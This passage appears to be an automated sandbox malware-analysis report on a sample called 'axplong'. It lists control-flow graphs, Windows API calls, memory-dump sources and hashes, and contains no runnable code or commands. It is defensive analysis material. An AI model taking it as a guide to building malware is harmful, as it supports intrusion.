f87f7b-f87f9b call fb8a81 1089->1092 1091->1092 1097 f87f9d-f87fac 1092->1097 1098 f87fd2-f87fd4 1092->1098 1100 f87fae-f87fbc 1097->1100 1101 f87fc2-f87fcf call f9d593 1097->1101 1102 f87fda-f87fe4 1098->1102 1098->1103 1100->1045 1100->1101 1101->1098 1102->1103 1103->1050 1107 f881f6 1103->1107 1107->1058
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F87EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: 2c4d15000932e17d168cc50dbf147d5f047eb00cb80fe5290c0cced51e513d67
                      • Instruction ID: 745ca92a7ffe2457f6b3474b19ebaf4feac64ce7b1f4a7ffe9dad99961216152
                      • Opcode Fuzzy Hash: 2c4d15000932e17d168cc50dbf147d5f047eb00cb80fe5290c0cced51e513d67
                      • Instruction Fuzzy Hash: A3D1E971E007449BDF14BB68CC4A7DD7771AB42720FA4428CE4156B3D2DB798E81ABD2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1228 fb6e01-fb6e36 GetFileType 1229 fb6eee-fb6ef1 1228->1229 1230 fb6e3c-fb6e47 1228->1230 1233 fb6f1a-fb6f42 1229->1233 1234 fb6ef3-fb6ef6 1229->1234 1231 fb6e69-fb6e85 call fb4020 GetFileInformationByHandle 1230->1231 1232 fb6e49-fb6e5a call fb7177 1230->1232 1243 fb6f0b-fb6f18 call fb740d 1231->1243 1249 fb6e8b-fb6ecd call fb70c9 call fb6f71 * 3 1231->1249 1246 fb6e60-fb6e67 1232->1246 1247 fb6f07-fb6f09 1232->1247 1235 fb6f5f-fb6f61 1233->1235 1236 fb6f44-fb6f57 1233->1236 1234->1233 1239 fb6ef8-fb6efa 1234->1239 1241 fb6f62-fb6f70 call f9cf21 1235->1241 1236->1235 1254 fb6f59-fb6f5c 1236->1254 1239->1243 1244 fb6efc-fb6f01 call fb7443 1239->1244 1243->1247 1244->1247 1246->1231 1247->1241 1264 fb6ed2-fb6eea call fb7096 1249->1264 1254->1235 1264->1235 1267 fb6eec 1264->1267 1267->1247
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00FB6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00FB6E7D
                      • __dosmaperr.LIBCMT ref: 00FB6F12
                        • Part of subcall function 00FB7177: __dosmaperr.LIBCMT ref: 00FB71AC
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 71c1553d863c1100b97075f0b97b7cff255bc992c3e5016cc818cdabce5edb93
                      • Instruction ID: 64ac393b5425da751ccd7ac19af53b06c7ceb55a837de428821a66d7a5f5ba3a
                      • Opcode Fuzzy Hash: 71c1553d863c1100b97075f0b97b7cff255bc992c3e5016cc818cdabce5edb93
                      • Instruction Fuzzy Hash: 7E413C75900204AADB24EFB6EC459FBB7F9EF88310B10451EF956D3611EA38A904EF60

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1305 fbd4f4-fbd515 call f9deb0 1308 fbd52f-fbd532 1305->1308 1309 fbd517 1305->1309 1311 fbd54e-fbd55a call fba688 1308->1311 1312 fbd534-fbd537 1308->1312 1310 fbd519-fbd51f 1309->1310 1309->1311 1313 fbd543-fbd54c call fbd43c 1310->1313 1314 fbd521-fbd525 1310->1314 1325 fbd55c-fbd55f 1311->1325 1326 fbd564-fbd570 call fbd47e 1311->1326 1312->1313 1315 fbd539-fbd53c 1312->1315 1329 fbd58c-fbd595 1313->1329 1314->1311 1317 fbd527-fbd52b 1314->1317 1318 fbd53e-fbd541 1315->1318 1319 fbd572-fbd582 call fb7443 call fb6b8a 1315->1319 1317->1319 1322 fbd52d 1317->1322 1318->1313 1318->1319 1319->1325 1322->1313 1330 fbd6cb-fbd6da 1325->1330 1326->1319 1335 fbd584-fbd589 1326->1335 1333 fbd5a2-fbd5b3 1329->1333 1334 fbd597-fbd59f call fb8c8b 1329->1334 1338 fbd5c9 1333->1338 1339 fbd5b5-fbd5c7 1333->1339 1334->1333 1335->1329 1341 fbd5cb-fbd5dc 1338->1341 1339->1341 1342 fbd64a-fbd65a call fbd687 1341->1342 1343 fbd5de-fbd5e0 1341->1343 1352 fbd6c9 1342->1352 1353 fbd65c-fbd65e 1342->1353 1345 fbd6db-fbd6dd 1343->1345 1346 fbd5e6-fbd5e8 1343->1346 1350 fbd6df-fbd6e6 call fb8cd3 1345->1350 1351 fbd6e7-fbd6fa call fb651d 1345->1351 1348 fbd5ea-fbd5ed 1346->1348 1349 fbd5f4-fbd600 1346->1349 1348->1349 1354 fbd5ef-fbd5f2 1348->1354 1355 fbd602-fbd617 call fbd4eb * 2 1349->1355 1356 fbd640-fbd648 1349->1356 1350->1351 1373 fbd708-fbd70e 1351->1373 1374 fbd6fc-fbd706 1351->1374 1352->1330 1359 fbd699-fbd6a2 1353->1359 1360 fbd660-fbd676 call fba531 1353->1360 1354->1349 1361 fbd61a-fbd61c 1354->1361 1355->1361 1356->1342 1384 fbd6a5-fbd6a8 1359->1384 1360->1384 1361->1356 1367 fbd61e-fbd62e 1361->1367 1372 fbd630-fbd635 1367->1372 1372->1342 1379 fbd637-fbd63e 1372->1379 1376 fbd710-fbd711 1373->1376 1377 fbd727-fbd738 RtlAllocateHeap 1373->1377 1374->1373 1375 fbd73c-fbd747 call fb7443 1374->1375 1385 fbd749-fbd74b 1375->1385 1376->1377 1380 fbd73a 1377->1380 1381 fbd713-fbd71a call fb9c81 1377->1381 1379->1372 1380->1385 1381->1375 1395 fbd71c-fbd725 call fb8cf9 1381->1395 1388 fbd6aa-fbd6ad 1384->1388 1389 fbd6b4-fbd6bc 1384->1389 1388->1389 1390 fbd6af-fbd6b2 1388->1390 1389->1352 1391 fbd6be-fbd6c6 call fba531 1389->1391 1390->1352 1390->1389 1391->1352 1395->1375 1395->1377
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 76dc5cf0d0a73e84177b8fcc3124a3973939bc7979fcf7fd02e1a287edce29f5
                      • Instruction ID: 5ddd5027d7426b161bd9dcad318cd540e8854096f1503d216f92952ce14f9a6f
                      • Opcode Fuzzy Hash: 76dc5cf0d0a73e84177b8fcc3124a3973939bc7979fcf7fd02e1a287edce29f5
                      • Instruction Fuzzy Hash: F6611472D012148BDF25EFAAD8857EDB7A1AB55334F28412AD445AB250FA349D00EF53

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1399 f882b0-f88331 call fb4020 1403 f8833d-f88365 call f97870 call f85b20 1399->1403 1404 f88333-f88338 1399->1404 1412 f88369-f8838b call f97870 call f85b20 1403->1412 1413 f88367 1403->1413 1405 f8847f-f8849b call f9cf21 1404->1405 1418 f8838d 1412->1418 1419 f8838f-f883a8 1412->1419 1413->1412 1418->1419 1422 f883d9-f88404 1419->1422 1423 f883aa-f883b9 1419->1423 1424 f88431-f88452 1422->1424 1425 f88406-f88415 1422->1425 1426 f883bb-f883c9 1423->1426 1427 f883cf-f883d6 call f9d593 1423->1427 1430 f88458-f8845d 1424->1430 1431 f88454-f88456 GetNativeSystemInfo 1424->1431 1428 f88427-f8842e call f9d593 1425->1428 1429 f88417-f88425 1425->1429 1426->1427 1432 f8849c-f884a1 call fb6b9a 1426->1432 1427->1422 1428->1424 1429->1428 1429->1432 1436 f8845e-f88465 1430->1436 1431->1436 1436->1405 1441 f88467-f8846f 1436->1441 1442 f88478-f8847b 1441->1442 1443 f88471-f88476 1441->1443 1442->1405 1444 f8847d 1442->1444 1443->1405 1444->1405
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00F88454
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 93a55a67492bc0b01b312bc557528112f88faae209c22b93c4725662b06c68f1
                      • Instruction ID: 831f48227d397087e34a9c2cb4095ecb466b43b249d88da68f399d4499f89b38
                      • Opcode Fuzzy Hash: 93a55a67492bc0b01b312bc557528112f88faae209c22b93c4725662b06c68f1
                      • Instruction Fuzzy Hash: 73514971D002089BEF24FB68CD49BEDB775DF45350F9042A9E808A72C1EF359E809B91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1445 fb6c99-fb6ca5 1446 fb6ca7-fb6cc3 call fb7430 call fb7443 call fb6b8a 1445->1446 1447 fb6cc4-fb6ce8 call fb4020 1445->1447 1453 fb6cea-fb6d04 call fb7430 call fb7443 call fb6b8a 1447->1453 1454 fb6d06-fb6d28 CreateFileW 1447->1454 1476 fb6d72-fb6d76 1453->1476 1455 fb6d2a-fb6d2e call fb6e01 1454->1455 1456 fb6d38-fb6d3f call fb6d77 1454->1456 1464 fb6d33-fb6d36 1455->1464 1468 fb6d40-fb6d42 1456->1468 1464->1468 1470 fb6d64-fb6d67 1468->1470 1471 fb6d44-fb6d61 call fb4020 1468->1471 1472 fb6d69-fb6d6f 1470->1472 1473 fb6d70 1470->1473 1471->1470 1472->1473 1473->1476
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 950678be05aa53c9fbbf337a7111bb0b3f4c45771a794836a1195aa1946c13ba
                      • Instruction ID: c6a8dad999b2559c34a2c5dbb444ca5bf6ff8ff5d76c77500151b6682602b1e1
                      • Opcode Fuzzy Hash: 950678be05aa53c9fbbf337a7111bb0b3f4c45771a794836a1195aa1946c13ba
                      • Instruction Fuzzy Hash: 79210A72A01208BAEB11BB669C42BEF37299F41378F114311F9247B1D1DB785E05BEA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1479 fb6f71-fb6f87 1480 fb6f89-fb6f8d 1479->1480 1481 fb6f97-fb6fa7 1479->1481 1480->1481 1482 fb6f8f-fb6f95 1480->1482 1485 fb6fa9-fb6fbb SystemTimeToTzSpecificLocalTime 1481->1485 1486 fb6fe7-fb6fea 1481->1486 1483 fb6fec-fb6ff7 call f9cf21 1482->1483 1485->1486 1489 fb6fbd-fb6fdd call fb6ff8 1485->1489 1486->1483 1491 fb6fe2-fb6fe5 1489->1491 1491->1483
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00FB6FB3
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 4dc30dabb9b2d25b45d5d41bce97e67b07961d9c327a71e8870b864a086c5d0e
                      • Instruction ID: d2eb4d6744b7b2998e08c2f9eeeb1b28b9a619a8f86c9243ec1aff739fc7297c
                      • Opcode Fuzzy Hash: 4dc30dabb9b2d25b45d5d41bce97e67b07961d9c327a71e8870b864a086c5d0e
                      • Instruction Fuzzy Hash: FB11A27290010CAADF10DED5D945EEF77BC9B48314F505166F515E6180EB34EB44DF61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1492 fbd6ef-fbd6fa 1493 fbd708-fbd70e 1492->1493 1494 fbd6fc-fbd706 1492->1494 1496 fbd710-fbd711 1493->1496 1497 fbd727-fbd738 RtlAllocateHeap 1493->1497 1494->1493 1495 fbd73c-fbd747 call fb7443 1494->1495 1501 fbd749-fbd74b 1495->1501 1496->1497 1498 fbd73a 1497->1498 1499 fbd713-fbd71a call fb9c81 1497->1499 1498->1501 1499->1495 1505 fbd71c-fbd725 call fb8cf9 1499->1505 1505->1495 1505->1497
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00FBA5ED,?,00FB74AE,?,00000000,?), ref: 00FBD730
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 8b7bc08bc9a003538154196a9808e46c48aeae29d30f6fb08f8dbda3b3bec2e4
                      • Instruction ID: 383661c17f5a4ab8cff99723d91e77194decfd0b7fa9754c409b117157993e64
                      • Opcode Fuzzy Hash: 8b7bc08bc9a003538154196a9808e46c48aeae29d30f6fb08f8dbda3b3bec2e4
                      • Instruction Fuzzy Hash: 76F0E932949125669B217A239C45BDB3B899F817B0B398111AC04EA181EE24DC017EF2

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: cd73181adc8d6a85787f3920366fd56b4a3eab8aae9451474ec105a3c967fbb8
                      • Instruction ID: f64ad3e808579d3fe6f3caf764a64bd9cf1041d3a9b81f2f8b076a741f83dbf5
                      • Opcode Fuzzy Hash: cd73181adc8d6a85787f3920366fd56b4a3eab8aae9451474ec105a3c967fbb8
                      • Instruction Fuzzy Hash: E8F0F971E10608BBCB00BB789D07B1D7B79A746B60F900348E811672E1EB38590067D3
                      Memory Dump Source
                      • Source File: 00000006.00000002.3001561757.0000000005480000.00000040.00001000.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5480000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96b462cb88adee6fb5affd315526f64d3dc736a0ce767884e6838edd985e9509
                      • Instruction ID: 3e673a0144afa6b4593de3759057df882e7421425ff2f8d22cfbe75e11a2608b
                      • Opcode Fuzzy Hash: 96b462cb88adee6fb5affd315526f64d3dc736a0ce767884e6838edd985e9509
                      • Instruction Fuzzy Hash: 4B11B2AF16D215BCB242F6956B18AFFABAFF5C77303308427F84AC5502D285064F61B2
                      Memory Dump Source
                      • Source File: 00000006.00000002.3001561757.0000000005480000.00000040.00001000.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5480000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7d764ed5856b2de0f9f3207dea711b5536bd5d0a6760c7f699dd0c140534c774
                      • Instruction ID: 0fce059cfe8fa664fe184198f4eceed752823ca54354f9fe748c24b9464cb4a6
                      • Opcode Fuzzy Hash: 7d764ed5856b2de0f9f3207dea711b5536bd5d0a6760c7f699dd0c140534c774
                      • Instruction Fuzzy Hash: 7601205F56D2116D5102F591A71D7FD6FEBB4C33303314557E487C58029284525F91B2
                      Memory Dump Source
                      • Source File: 00000006.00000002.3001561757.0000000005480000.00000040.00001000.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5480000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59a8788e52d5ae3c67c6332bd683ca5668c0288df65072b01628d2f25f0fe0d0
                      • Instruction ID: cd310d63645c21a03eb99b2068aaf2c1ed0557ef602bdff1e2a0c5f6f77b84cf
                      • Opcode Fuzzy Hash: 59a8788e52d5ae3c67c6332bd683ca5668c0288df65072b01628d2f25f0fe0d0
                      • Instruction Fuzzy Hash: 3BF0F9EF169115BD7192E1856B18AFA67AFE0C77303308427F946C0902D2891A9F6132
                      Memory Dump Source
                      • Source File: 00000006.00000002.3001561757.0000000005480000.00000040.00001000.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5480000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7f503d674dc4adfa6eaea8f97798c0929603066eb6b473933962fb49b1604b8b
                      • Instruction ID: b344d8a9adb6271250e5f116c456272cc47c6d13eb271487c7223bc83a15c63d
                      • Opcode Fuzzy Hash: 7f503d674dc4adfa6eaea8f97798c0929603066eb6b473933962fb49b1604b8b
                      • Instruction Fuzzy Hash: CAE0266F1A8111CD8191F13E2C6C7FE26DAB1D63313304A63E45AC1A41C508935F1231
                      Memory Dump Source
                      • Source File: 00000006.00000002.3001561757.0000000005480000.00000040.00001000.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5480000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6abf67f9ab1289398d1d610891685a3cce6900d261f94c15c760a5242d17f40d
                      • Instruction ID: ba27b3c59168cdf070465feb5fbd4f156f5c2d82684bbdcd758f9e1e67070138
                      • Opcode Fuzzy Hash: 6abf67f9ab1289398d1d610891685a3cce6900d261f94c15c760a5242d17f40d
                      • Instruction Fuzzy Hash: 29D0C72F07A212DC4292F129AD1CBFE6ACBB0CA3303204023E08BC1A02A609520F5271
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
